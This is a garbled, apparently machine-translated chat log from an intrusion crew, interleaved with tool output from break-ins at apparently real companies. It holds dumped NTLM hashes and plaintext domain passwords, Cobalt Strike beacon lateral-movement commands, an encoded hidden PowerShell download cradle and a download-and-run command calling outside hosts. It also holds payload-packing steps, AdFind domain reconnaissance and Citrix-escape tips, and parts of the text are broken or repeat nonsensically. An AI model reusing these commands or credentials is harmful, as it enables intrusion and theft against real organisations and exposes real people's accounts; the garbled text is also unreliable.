192.0.0.26
192.0.0.31
10.77.8.53
170.7.30.50
170.7.182.58
``Even an administrator without rights) it's already on all the machines where it did not pass the server is not among them? great).Pass from the admin account and vhsfixit3 ``no) from the server?
Administrator:500:aad3b435b51404eeaad3b435b51404ee:476ae6f7f0259d84b82f33a4e55a88c5:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:17c9bb6e7168ad5e10483392f3a81ca4:::
whsetup:1001:aad3b435b51404eeaad3b435b51404ee:476ae6f7f0259d84b82f33a4e55a88c5:::
``````
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
adm-cavailj adm-GrelleS Administrator
alexanm bmccm fowlerh
lucase moorer2 owensd
petersm2 polyreyadmin roeders
solarwindsarm.svc vyombmccm
why don't you like cisks? are they on win-server? and the rest are bypassed[ ](https://mediaeveryone.com/group/wilsonart-com?msg=STBkdmLKvXLeWSCBE) here try[ ](https://mediaeveryone.com/group/wilsonart-com?msg=evkNa5rkpfaMrce68) here some cisks like those previous ones with the admin ball bypassed all? on these ten tens try to get patched zero here?the answer is no it's not. the answer is no it's not. the answer is no it's not. the answer is no it's not. the answer is no it's not. the answer is no it's not. the answer is no it's nothing. the answer is no it's nothing. the answer is no it's nothing. the answer is no it's nothing. the answer is no it's nothing. the answer is no it's nothing. the answer is no it's nothing.
Connecting to 10.102.71.35...
Starting PSEXESVC service on 10.102.71.35...
Connecting with PsExec service on 10.102.71.35...
Starting powershell.exe on 10.102.71.35...
PsExec could not start powershell.exe on 10.102.71.35..:

``Where have been - yes on all servers simantic stands? tpsh? with flags at startup disappears there moveszversky saymtek rub dllkuponjalma all so and replace to a point that, your messages you can delete yourself) delete the case this last flags with one minus not rightly assembled ``
./shellConcatination --source=shellStarter_llvm_x64.dll --target=x64.dll --addBin=payload.bin -keep -self
``collect llvm here with kip and selfnova clean``.
23.82.140.215
https://expoless.com
----------------------------------------------------------------------------------------
104.171.123.166:45330
xubNIvoc8qkr10QFT2G68WprzDndxfBN0EP
``empty file change the coba does not work the same way as last time? but it does not work, i used to build with lvm builder, without the flag, that's the saved in the notes command are you still using the coba cleaner? you build llvm with your hands? it's more convenient without it ``
./shellConcatination --source=shellStarter_x64.dll --target=x64.dll --addBin=payload.bin

``that it disappears did you collect with what flag?
Shares for 170.7.5.54:
	[--- Listable Shares ---]
		ADMIN$
		C$
		D$
		NxT$
		NxTDeve$
		NxTPyqa$
		NxTTest$


Shares for 170.7.5.58:
	[--- Listable Shares ---]
		ADMIN$
		C$
		D$
		NxT$
		NxTDeve$
		NxTPyqa$
		NxTTest$

Shares for 170.7.5.57:
	[--- Listable Shares ---]
		ADMIN$
		C$
		D$
		NxT$
		NxTDeve$
		NxTPyqa$
		NxTTest$
``Yes and the dell disappears in both cases. The service starts and the session does not work too? rundll32.exe C:\Windows\Temp\x64.dll,why is not it separated by a comma?in the tpsh? now pingingvnneshku can see? in general, yes, let's check the server? Symantec what edr? what kind of axis? topsession does not fly startcobalt works?
beacon> remote-exec psexec 10.102.71.35 rundll32 C:\Windows\Temp\x64.dll entryPoint
[*] Tasked beacon to run 'rundll32 C:\Windows\Temp\x64.dll entryPoint' on 10.102.71.35 via Service Control Manager
[+] host called home, sent: 1805 bytes
[+] received output:
Started service 2aed3bf on 10.102.71.35
``Hmmm a psec?
ERROR:
Description = The RPC server is unavailable.
``Check osvmik is available''.
Shares for 10.102.71.35:
	[--- Listable Shares ---]
		ADMIN$
		C$

Shares for 10.102.70.83:
	[--- Listable Shares ---]
		ADMIN$
		C$

Shares for 10.102.72.34:
	[--- Listable Shares ---]
		ADMIN$
		C$
``hyperion_Service
waglobal2014[ ](https://mediaeveryone.com/group/wilsonart-com?msg=XnLhmrLKcJdQbWszZ) this is where we already did it...search from here `*HYPERION_ADMIN````
Global Group memberships *Austin_PW_Group *HYPERION_ADMIN
                             *Domain Users
``I gave a list``.
shell wmic /node:78186W7P os get osarchitecture
[*] Tasked beacon to run: wmic /node:78186W7P os get osarchitecture
[+] host called home, sent: 72 bytes
[+] received output:
Node - 78186W7P

ERROR:

Description = Access is denied.




``and don't flub like this``beacon> shell wmic /node:78186W7P os get osarchitecture``
\\78186W7P.Wilsonart.com\ADMIN$ - Remote Admin
\ED79161W10P.Wilsonart.com/ADMIN$ - Remote Admin
\79337W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\78192W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78204W7P.Wilsonart.com/ADMIN$ - Remote Admin
\79220W10P.Wilsonart.com/ADMIN$ - Remote Admin
\73932W7P.Wilsonart.com/ADMIN$ - Remote Admin
\76869W7P.Wilsonart.com/ADMIN$ - Remote Admin
\DCWAS25.Wilsonart.com/ADMIN$ - Remote Admin
\\DEVBIOBI.Wilsonart.comADMIN$ - Remote Admin
\EL79470W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\79196W10P.Wilsonart.com/ADMIN$ - Remote Admin
\74617W7P.Wilsonart.com/ADMIN$ - Remote Admin
\EL80143W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\78486W10P.Wilsonart.com/ADMIN$ - Remote Admin
\74496W7P.Wilsonart.com/ADMIN$ - Remote Admin
\79855W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\DCWAS84.Wilsonart.com/ADMIN$ - Remote Admin
\\VyomLabs4.Wilsonart.comADMIN$ - Remote Admin
\\HQTAS73.Wilsonart.comADMIN$ - Remote Admin
\\{\79127W10P.Wilsonart.com/ADMIN$ - Remote Admin
\78722W7P64.Wilsonart.com/ADMIN$ - Remote Admin
\73339W7P.Wilsonart.com/ADMIN$ - Remote Admin
\74211W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78229W7E64.Wilsonart.com/ADMIN$ - Remote Admin
\77831W7P.Wilsonart.com/ADMIN$ - Remote Admin
\73368W7P.Wilsonart.com/ADMIN$ - Remote Admin
\\{\TNTAS08.Wilsonart.com/ADMIN$ - Remote Admin
\ED79126W10P.Wilsonart.com/ADMIN$ - Remote Admin
\73747W7P.Wilsonart.com/ADMIN$ - Remote Admin
\DRWAS07.Wilsonart.com/ADMIN$ - Remote Admin
\DCWAS39.Wilsonart.com/ADMIN$ - Remote Admin
\74172W7P.Wilsonart.com/ADMIN$ - Remote Admin
\\QABIWEB.Wilsonart.comADMIN$ - Remote Admin
\EL76306W7E.Wilsonart.com/ADMIN$ - Remote Admin
\79146W10P.Wilsonart.com/ADMIN$ - Remote Admin
\DCWAS98.Wilsonart.com/ADMIN$ - Remote Admin
\\QABIPLN.Wilsonart.comADMIN$ - Remote Admin
\77374W7P.Wilsonart.com/ADMIN$ - Remote Admin
\74081W7P.Wilsonart.com/ADMIN$ - Remote Admin
\DT03W7P64.Wilsonart.com/ADMIN$ - Remote Admin
\73313W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78172W10P.Wilsonart.com/ADMIN$ - Remote Admin
\\{\HeathDesktop.Wilsonart.com/ADMIN$ - Remote Admin
\EL79448W10P.Wilsonart.com/ADMIN$ - Remote Admin
\77953W7E32.Wilsonart.com/ADMIN$ - Remote Admin
\75516W7P.Wilsonart.com/ADMIN$ - Remote Admin
\77956W7P.Wilsonart.com/ADMIN$ - Remote Admin
\\QABIESS.Wilsonart.comADMIN$ - Remote Admin
\77830W7P.Wilsonart.com/ADMIN$ - Remote Admin
\DCWAS03.Wilsonart.com/ADMIN$ - Remote Admin
\\73346W7P.Wilsonart.comADMIN$ - Remote Admin
\EL79469W10P.Wilsonart.com/ADMIN$ - Remote Admin
\74494W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78070W7P.Wilsonart.com/ADMIN$ - Remote Admin
\74205W7P.Wilsonart.com/ADMIN$ - Remote Admin
\74015W7P.Wilsonart.com/ADMIN$ - Remote Admin
\77195W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78210W7P.Wilsonart.com/ADMIN$ - Remote Admin
\76801W7P.Wilsonart.com/ADMIN$ - Remote Admin
\79151W10P.Wilsonart.com/ADMIN$ - Remote Admin
\ITWDS02.Wilsonart.com/ADMIN$ - Remote Admin
\79904W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\74181W7P.Wilsonart.com/ADMIN$ - Remote Admin
\79192W10P.Wilsonart.com/ADMIN$ - Remote Admin
\77403W10P.Wilsonart.com/ADMIN$ - Remote Admin
\78715W10P.Wilsonart.com/ADMIN$ - Remote Admin
\UKWAS01.Wilsonart.com/ADMIN$ - Remote Admin
\L79009W10P.Wilsonart.com/ADMIN$ - Remote Admin
\\{\73689W7P.Wilsonart.com/ADMIN$ - Remote Admin
\73923W7P.Wilsonart.com/ADMIN$ - Remote Admin
\79214W10P.Wilsonart.com/ADMIN$ - Remote Admin
\DCVEEAM02.Wilsonart.com/ADMIN$ - Remote Admin
\ED79160W10P.Wilsonart.com/ADMIN$ - Remote Admin
\76406W7E64.Wilsonart.com/ADMIN$ - Remote Admin
\73860W7P.Wilsonart.com/ADMIN$ - Remote Admin
\dcwas88.Wilsonart.com/ADMIN$ - Remote Admin
\ES79799W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\78179W7P.Wilsonart.com/ADMIN$ - Remote Admin
\75537W7P.Wilsonart.com/ADMIN$ - Remote Admin
\76032W10E.Wilsonart.com/ADMIN$ - Remote Admin
\75574W7P.Wilsonart.com/ADMIN$ - Remote Admin
\\QABIHFM.Wilsonart.comADMIN$ - Remote Admin
\\DDCWAS09.Wilsonart.comADMIN$ - Remote Admin
\EL77610W10E.Wilsonart.com/ADMIN$ - Remote Admin
\PRDBITAB.Wilsonart.com/ADMIN$ - Remote Admin
\78220W7P.Wilsonart.com/ADMIN$ - Remote Admin
\EL80150W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\LWDA-DC.Wilsonart.com/ADMIN$ - Remote Admin
\78167W7P.Wilsonart.com/ADMIN$ - Remote Admin
\DT01W7P64.Wilsonart.com/ADMIN$ - Remote Admin
\78735W10E64.Wilsonart.com/ADMIN$ - Remote Admin
\80109W10P.Wilsonart.com/ADMIN$ - Remote Admin
\78140W7P.Wilsonart.com/ADMIN$ - Remote Admin
``170.7.5.11a well you do it in front of me
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
``and the session under the token polzakaday access to kobud[ ](https://mediaeveryone.com/group/wilsonart-com?msg=SQHQuPXRXCcnJHStn) you mean to say that nothing shot?com/group/wilsonart-com?msg=eg7axbgv8FLsY22FG) yes it took out all the balls, not even available)) fucking laugh if you're laughing ishell dir \\\share\C$ does not give anything at alla?These balloons aren't opening. Is this the domain controller?\\LWDA-DC.Wilsonart.com\ADMIN$ - Remote Admin170.7.5.19170.7.14.20469:1488 uy (@tl2 there are no kerbs from here yet?exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0ARABBAEcANABBAHEAUgBLAHQATwB1AFAATwB6AG0AZgB0AE4AcwBNAHIAcABiADEAaQBhADQAMgBZAGYAQwBBAFIAaABVAGMAQwB4ADYAUAAnACkAKQA7AA==http://45.126.210.66:8080/Bl0vJ08/231.msi>http://dropmefiles.com/XXwJl0.dead.pkgprod.com there's no one else to go to) more like this: and you know what this means?) right!
adfind.exe -f "(objectcategory=person)" > ad_users.txt
adfind.exe -f "objectcategory=computer" > ad_computers.txt
adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet)> subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp > trustdmp.txt

``How is it ``get the right hell info``? and kerbs get the right hell infoa do you know what it means?))fuck 30 trustadministrations no da da@tl2 do not forget to downloadcomps are downloaded found on the machine TightVNC but where the configs no idea throw the standard output of programs filez from different workstations and study the FS of workstations exactly nado search confignu means somewhere is some VPN where almost anyone can go ...look for "correct" link to loginpolya)lolcreeds of users in the browsers more preciselythat if there are pointers to Citrix it makes sense to check the creeds of users browsersIt seems that machines with Citrix as provides stable access thin clients also live alternative to VPNRemote/Citrix/VPN something like that in AD there are pointers to VPN? in users or cars we searched in neighboring computers - about 20-25 probably checked
no signs of software found (in other cases, it makes sense to search for relevant processes or signs of installed software@user1 well, this is for "native" vpn as i understand? so, what about the config? do you have a session? how to promote? it does not work with Citrix? no sessions as i understand no? parsing is working with the network via kmd, trying to raise the rights without backconnect parsing is what? 1) dns tunneling
2) parsing WITHOUT EXTERNAL CONNECTION This is where the fun part starts.
we have two options really do not (no))) now look whether there is no external at all? tried powershell command generated input - seems to run but no session they are swearing at something, and what I did not have time to understandһttp://gist.githubcom/ethack/110f7f46272447828352768e6cd1c4cb through downloadstring and iche easier to do so, or rather not from a file but from a buffer possible to make an intermediate input script which from a file will emulate keystrokes, did it when they had to without a buffer large lines to type manually = )))) there clipboard does not work - any ideas how? one of "chips" Citrix
if the kmd is already running - it won't close even if the citrix session dieshttp://cobaltstrike.com/help-externalc2 then the session will stay alive and if the kmd opens the host is back:confused:Hello!:metal:hello everybody)I think something like `powershellexe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe")
NOT via rdp
```
I wrote above startup of usual applications is logged simply, those which have already been marked as "current"
plus if a user comes in at the time of the work and sees the new ones on his dashboard... Well, in general there is no need)) and use those that are available, they "can" go up in the allowed applications should not make changes Passage to the webserver from the frontend, if it will be much later, it is a very vast topic and requires a fairly deep understanding of web technologies, well, at least when we are not talking about vulnerabilities wordpress blogs = )This "basic" checklist for citrix escapehttps://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/цитрикс is a thin client, but still it is webvpn which is almost always tied up
https://sf.primeinc.com/vpn/index.html
ziegd
SuperbowlChamps20
```

call kmd = )
NOT through rdpna collective intelligence))so, a practical taskpohyalnaya, now namut...we do not haveGood morning. Any live sessions for further practice? Good morning, Monday at what time? Send the code to the email0.dead.snu.edu)) are there more networks?
in the appendix is spinning endlessly under all users and from several dedicates
web page does not open (check all hosts account
if it is valid somewhere - try to crash on rdp``
dn:CN=Event User 01,OU=Events,OU=SNU,DC=ad,DC=snu,DC=edu
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: Event User 01
>sn: User
>description: SNU!2ocks Default - 23Testing! Concussion
>givenName: Event
>distinguishedName: CN=Event User 01,OU=Events,OU=SNU,DC=ad,DC=snu,DC=edu
>instanceType: 4
>whenCreated: 20160119155159.0Z
>whenChanged: 20210106164017.0Z
>displayName: Event User 01
>uSNCreated: 66802
>memberOf: CN=Event Access,OU=Events,OU=SNU,DC=ad,DC=snu,DC=edu
>memberOf: CN=Lab Access,OU=Groups,OU=Users and Groups,OU=SNU,DC=ad,DC=snu,DC=edu
>memberOf: CN=Testing Center Printing,OU=Groups,OU=Users and Groups,OU=SNU,DC=ad,DC=snu,DC=edu
>uSNChanged: 25883282
>name: Event User 01
>objectGUID: {C8B96D46-4384-4E0B-922D-5DAB93CC0BBF}
>userAccountControl: 512
>badPwdCount: 0
>codePage: 0
>countryCode: 0
>homeDirectory: \atlantis\data\users\eventuser01
>homeDrive: W:
>badPasswordTime: 132551271550074552
>lastLogoff: 0
>lastLogon: 132551272172896078
>pwdLastSet: 132461210014856025
>primaryGroupID: 513
>objectSid: S-1-5-21-345900591-3691298009-1159447958-9865
>accountExpires: 9223372036854775807
>logonCount: 210
>sAMAccountName: eventuser01
>sAMAccountType: 805306368
>userPrincipalName: eventuser01@ad.snu.edu
>lockoutTime: 0
>objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=ad,DC=snu,DC=edu
>dSCorePropagationData: 20191224181403.0Z
>dSCorePropagationData: 20191224181400.0Z
>dSCorePropagationData: 16010101000417.0Z
>lastLogonTimestamp: 132544248075062010
``````
Pinging GTZCH1ADC01.GlobalTranz.local [10.222.3.20] with 32 bytes of data:
Request timed out.

Ping statistics for 10.222.3.20:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZMSPADC02.GlobalTranz.local [10.222.1.30] with 32 bytes of data:
Request timed out.

Ping statistics for 10.222.1.30:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZSLCADC01.GlobalTranz.local [10.222.2.20] with 32 bytes of data:
Reply from 10.222.2.20: bytes=32 time=26ms TTL=124

Ping statistics for 10.222.2.20:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 26ms, Maximum = 26ms, Average = 26ms

Pinging GTZPSVADC02.GlobalTranz.local [10.222.5.30] with 32 bytes of data:
Reply from 10.222.5.30: bytes=32 time=8ms TTL=125

Ping statistics for 10.222.5.30:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 8ms, Maximum = 8ms, Average = 8ms

Pinging GTZMSPADC01.GlobalTranz.local [10.222.1.20] with 32 bytes of data:
Request timed out.

Ping statistics for 10.222.1.20:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZAZRADC01.GlobalTranz.local [172.24.2.10] with 32 bytes of data:
Reply from 172.24.2.10: bytes=32 time=38ms TTL=128

Ping statistics for 172.24.2.10:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 38ms, Maximum = 38ms, Average = 38ms

Pinging GTZAZRADC02.GlobalTranz.local [172.24.2.20] with 32 bytes of data:
Reply from 172.24.2.20: bytes=32 time=33ms TTL=128

Ping statistics for 172.24.2.20:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 33ms, Maximum = 33ms, Average = 33ms

Pinging GTZCH1ADC02.GlobalTranz.local [10.222.3.30] with 32 bytes of data:
Request timed out.

Ping statistics for 10.222.3.30:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZPSVADC01.GlobalTranz.local [10.222.5.20] with 32 bytes of data:
Reply from 10.222.5.20: bytes=32 time=7ms TTL=125

Ping statistics for 10.222.5.20:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 7ms, Maximum = 7ms, Average = 7ms

Pinging GTZSLCADC02.GlobalTranz.local [10.222.2.30] with 32 bytes of data:
Reply from 10.222.2.30: bytes=32 time=27ms TTL=124

Ping statistics for 10.222.2.30:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 27ms, Maximum = 27ms, Average = 27ms

Pinging GTZMS2ADC02.GlobalTranz.local [10.0.61.34] with 32 bytes of data:
Request timed out.

Ping statistics for 10.0.61.34:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZMS2ADC01.GlobalTranz.local [10.0.61.33] with 32 bytes of data:
Request timed out.

Ping statistics for 10.0.61.33:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZCH2ADC01.GlobalTranz.local [10.222.4.20] with 32 bytes of data:
Reply from 10.222.4.20: bytes=32 time=51ms TTL=124

Ping statistics for 10.222.4.20:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 51ms, Maximum = 51ms, Average = 51ms

Pinging GTZPHXADC01.GlobalTranz.local [10.222.0.100] with 32 bytes of data:
Reply from 10.222.0.100: bytes=32 time=28ms TTL=127

Ping statistics for 10.222.0.100:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 28ms, Maximum = 28ms, Average = 28ms

Pinging GTZCH2ADC02.GlobalTranz.local [10.222.4.30] with 32 bytes of data:
Reply from 10.222.4.30: bytes=32 time=44ms TTL=124

Ping statistics for 10.222.4.30:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 44ms, Maximum = 44ms, Average = 44ms

Pinging GTZPHXADC02.GlobalTranz.local [10.222.0.200] with 32 bytes of data:
Reply from 10.222.0.200: bytes=32 time=24ms TTL=127

Ping statistics for 10.222.0.200:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 24ms, Maximum = 24ms, Average = 24ms

Pinging GTZTULADC01.GlobalTranz.local [10.0.40.41] with 32 bytes of data:
Request timed out.

Ping statistics for 10.0.40.41:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZTULADC02.GlobalTranz.local [10.0.40.42] with 32 bytes of data:
Request timed out.

Ping statistics for 10.0.40.42:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

``We should have taken the hash check off not yes''.
Pinging GTZAZRCASUB01.GlobalTranz.local [172.24.2.8] with 32 bytes of data:
Reply from 172.24.2.8: bytes=32 time=27ms TTL=128

Ping statistics for 172.24.2.8:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 27ms, Maximum = 27ms, Average = 27ms

beacon> shell net use \\172.24.2.8\c$ "MountainD3w!"/user:GlobalTranz.local\joel.reed
[*] Tasked beacon to run: net use \\172.24.2.8\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed
[+] host called home, sent: 103 bytes
[+] received output:
System error 5 has occurred.

Access is denied.

But getting up would certainly be a good idea right now, imho.
tomorrow if everything survives - krepaneu quietly and you can go to the inspection on any servachek you try there? on dc not over the e probably all in a slip? zakruglyatsyaa me here does not want to fly session from there) only easier i will take tomorrow more vpns suchdobii tomorrow while i have no current accessa then get up sooner wrap up for today, here you and the entrance to another domain) ```but you have to get up now and go to the other side of the house) ¶¶
Pinging GlobalTranz.local [10.222.0.100] with 32 bytes of data:
Reply from 10.222.0.100: bytes=32 time=28ms TTL=127

Ping statistics for 10.222.0.100:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 28ms, Maximum = 28ms, Average = 28ms

beacon> shell net use \\10.222.0.100\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed
[*] Tasked beacon to run: net use \\10.222.0.100\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed
[+] host called home, sent: 105 bytes
[+] received output:
The command completed successfully.

``in two domains admin
GLOBALNET\joel.reed:MountainD3w!
``If there pdk not in azure - then you can) dsinkat?) do not) well hashdamnapat I will not pdknut I see hashes and kleer even see not 2008 so there pdk 12 serverpalets tired to moth))))) why are you so with me?

Authentication Id : 1 ; 2706300524 (00000001:a14ede6c)
Session : RemoteInteractive from 28
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/20/2020 11:05:54 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 2706300488 (00000001:a14ede48)
Session : RemoteInteractive from 28
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/20/2020 11:05:54 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 2344160807 (00000001:8bb90e27)
Session : RemoteInteractive from 26
User Name : ctrails
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/17/2020 8:50:33 AM
SID : S-1-5-21-498103351-3997332795-3100871051-5297
	msv :
	 [00000003] Primary
	 * Username : ctrails
	 * Domain : GLOBALNET
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	 [00010000] CredentialKeys
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	tspkg :
	wdigest :
	 * Username : ctrails
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ctrails
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 1 ; 2344154206 (00000001:8bb8f45e)
Session : Interactive from 26
User Name : DWM-26
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/17/2020 8:50:31 AM
SID : S-1-5-90-26
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 061a041b9645791509f4fe7527c3851a
	 * SHA1 : c6d6b0c66dc63f47d18d5ce8fa97f49afc4fdc0c
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 9c 22 81 90 6a ae db 59 9f 6c 02 2c e1 c3 aa 75 de 25 d2 83 2c 57 5d 62 ce 06 54 c9 61 5f 04 37 d6 9e 11 1c eb 6c 99 16 67 04 07 42 be 92 cb 25 ac 48 2c 80 47 10 ed 88 61 16 e9 50 8c 55 99 07 a8 e1 fe fd 95 f3 19 87 1c 9d 2a 56 c1 51 24 29 8f a7 8c 96 89 e9 00 94 62 03 a0 bb 93 55 d1 2d 9f 8a 4e fd c1 85 e1 ef 21 3a 9c b1 32 8b b6 d3 a5 83 a6 09 f9 f3 0d 7d e1 84 db ff 68 ad 19 79 dd 83 2f 5b 46 07 67 4d f8 dc 4a fc f3 a4 4d b5 35 dc fe 91 b9 1f a0 7d 45 e1 16 aa 84 e5 84 77 f9 73 0f a6 be 41 b6 01 1d 5e 3e 2c 1e 7c a2 a8 7f 5e 70 d1 a8 14 93 99 48 da fd 90 31 f7 e5 d0 50 16 11 53 37 48 61 a6 63 21 bd 34 fa fe 95 47 c5 74 19 b7 8e 97 a9 59 41 c1 72 81 86 ec e1 be b8 1b fd 19 5b 16 1d ba e3 b0 c8 a8 28 2e d1 84
	ssp :
	credman :

Authentication Id : 1 ; 2344154166 (00000001:8bb8f436)
Session : Interactive from 26
User Name : DWM-26
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/17/2020 8:50:31 AM
SID : S-1-5-90-26
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5
	ssp :
	credman :

Authentication Id : 1 ; 1757521917 (00000001:68c1a7fd)
Session : RemoteInteractive from 25
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/11/2020 9:12:31 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	 [00000003] Primary
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	 [00010000] CredentialKeys
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	tspkg :
	wdigest :
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : g.boles
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 1 ; 1757518223 (00000001:68c1998f)
Session : Interactive from 25
User Name : DWM-25
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/11/2020 9:12:30 AM
SID : S-1-5-90-25
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 061a041b9645791509f4fe7527c3851a
